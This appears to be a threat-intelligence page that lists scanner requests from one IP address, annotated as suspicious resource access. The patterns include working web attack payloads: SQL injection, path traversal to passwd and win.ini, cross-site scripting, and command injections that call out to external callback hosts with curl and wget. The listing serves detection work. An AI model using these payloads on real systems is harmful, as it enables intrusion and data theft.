One Ticket Available.

One meeting. One person.
The Next Moon Show Is: Flower Moon

Annotations for 142.93.156.34

Oct. 19, 2023, 8:41 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/login/)
Pattern: /login/
Oct. 19, 2023, 8:37 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/dashboardUser)
Pattern: /dashboardUser
Oct. 19, 2023, 8:30 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-)
Pattern: /module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-
Oct. 19, 2023, 8:29 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/jeecg-boot/sys/user/querySysUser?username=admin)
Pattern: /jeecg-boot/sys/user/querySysUser?username=admin
Oct. 19, 2023, 8:29 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/jeecg-boot/actuator/httptrace/)
Pattern: /jeecg-boot/actuator/httptrace/
Oct. 19, 2023, 8:23 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com)
Pattern: /autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
Oct. 19, 2023, 8:23 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com)
Pattern: /autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
Oct. 19, 2023, 8:23 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/cgi/networkDiag.cgi)
Pattern: /cgi/networkDiag.cgi
Oct. 19, 2023, 8:18 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/oam/server/opensso/sessionservice)
Pattern: /oam/server/opensso/sessionservice
Oct. 19, 2023, 8:18 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/Config/SaveUploadedHotspotLogoFile)
Pattern: /Config/SaveUploadedHotspotLogoFile
Oct. 19, 2023, 8:18 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/Assets/temp/hotspot/img/logohotspot.txt)
Pattern: /Assets/temp/hotspot/img/logohotspot.txt
Oct. 19, 2023, 8:17 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==)
Pattern: /system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==
Oct. 19, 2023, 8:17 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==)
Pattern: /system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==
Oct. 19, 2023, 8:14 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/file?valore=../../../../../windows/win.ini)
Pattern: /file?valore=../../../../../windows/win.ini
Oct. 19, 2023, 8:13 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/api/get_device_details)
Pattern: /api/get_device_details
Oct. 19, 2023, 8:06 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1)
Pattern: /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1
Oct. 19, 2023, 7:59 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini)
Pattern: /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
Oct. 19, 2023, 7:49 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/ui_base/js/..%2f..%2f..%2f..%2fsettings.js)
Pattern: /ui_base/js/..%2f..%2f..%2f..%2fsettings.js
Oct. 19, 2023, 7:49 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/ui_base/js/..%2f..%2f..%2f..%2fsettings.js)
Pattern: /ui_base/js/..%2f..%2f..%2f..%2fsettings.js
Oct. 19, 2023, 7:49 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd)
Pattern: /ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
Oct. 19, 2023, 7:49 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd)
Pattern: /ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
Oct. 19, 2023, 7:42 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log)
Pattern: /gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log
Oct. 19, 2023, 7:34 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (//uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://cknib5h1svoi45dm9rtgeeidhcr1i4pay.oast.site)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything)
Pattern: //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://cknib5h1svoi45dm9rtgeeidhcr1i4pay.oast.site)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything
Oct. 19, 2023, 7:34 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/ajax/networking/get_netcfg.php?iface=;curl%20cknib5h1svoi45dm9rtg8hnqdkdd5hgkc.oast.site/`whoami`;)
Pattern: /ajax/networking/get_netcfg.php?iface=;curl%20cknib5h1svoi45dm9rtg8hnqdkdd5hgkc.oast.site/`whoami`;
Oct. 19, 2023, 7:29 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/service/v1/service-details)
Pattern: /service/v1/service-details
Oct. 19, 2023, 7:29 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/RPC2_Login)
Pattern: /RPC2_Login
Oct. 19, 2023, 7:27 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/status.htm)
Pattern: /status.htm
Oct. 19, 2023, 7:26 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E)
Pattern: /widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
Oct. 19, 2023, 7:21 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/pentaho/api/userrolelist/systemRoles?require-cfg.js)
Pattern: /pentaho/api/userrolelist/systemRoles?require-cfg.js
Oct. 19, 2023, 7:21 a.m.
Annotator: Never200Annotator
Label: Golden Annotation: Suspicious resource access (/api/userrolelist/systemRoles?require-cfg.js)
Pattern: /api/userrolelist/systemRoles?require-cfg.js